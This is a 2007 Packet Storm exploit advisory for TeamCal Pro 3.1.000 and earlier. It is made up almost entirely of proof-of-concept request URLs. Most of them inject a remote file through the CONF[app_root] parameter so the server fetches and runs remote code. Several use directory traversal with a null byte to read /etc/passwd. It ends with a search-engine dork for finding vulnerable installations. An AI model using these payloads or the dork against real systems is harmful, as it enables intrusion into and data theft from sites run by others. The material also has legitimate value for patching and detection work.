teamcal-rfilfi.txt

2007-12-28T00:00:00
ID PACKETSTORM:62111
Type packetstorm
Reporter GolD_M
Modified 2007-12-28T00:00:00

Description

                                        
                                            ` ############## ###### ###### ######## ######## ###### ######  
## ## ## ## ## ## ## ## ## #### ####   
## #### ###### ## ## ######## ## ## ######## #### ####   
## #### ## ## ## ## ## ## ## ## ## ## ##   
## ## ## ########## ## ###### ## ## ## ## ## ##   
## ## ## ## ## ## ## ## ## ## ## ##   
## ## ## ## ## ## ## #### ## ## ## ## ## ##   
###### ########## ###### ########## ###### #### ###### ######## ###### ######  
  
  
  
TeamCal Pro <= 3.1.000 Multiple RFI / LFI Vulnerabilities  
Script: http://www.lewe.com/index.php?option=com_docman&task=cat_view&gid=112&Itemid=27  
POC :  
http://localhost/ScriptPage/includes/tcuser.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/absencecount.inc.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/avatar.inc.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/csvhandler.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/functions.tcpro.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/header.html.inc.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/joomlajack.tcpro.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/menu.inc.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/other.inc.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/tcabsence.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/tcabsencegroup.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/tcallowance.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/tcannouncement.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes/tcconfig.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes//tcdaynote.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes//tcgroup.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes//tcholiday.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes//tclogin.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes//tcmonth.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes//tctemplate.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes//tcuser.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes//tcusergroup.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage/includes//tcuseroption.class.php?CONF[app_root]=http://localhost/020.txt?  
http://localhost/ScriptPage//index.php?lang=../../../../../../../../etc/passwd%00  
http://localhost/ScriptPage//register.php?lang=../../../../../../../../etc/passwd%00  
http://localhost/ScriptPage/login.php?lang=../../../../../../../../etc/passwd%00  
http://localhost/ScriptPage/statistics.php?lang=../../../../../../../../etc/passwd%00   
  
Dork : http://www.google.com.sa/search?q=Powered+by+TeamCal+Pro&ie=utf-8&oe=utf-8&rls=org.mozilla:ar:official&client=firefox-a  
SP.Thanx To : Tryag.Com/cc [Tryag-Team]  
  
`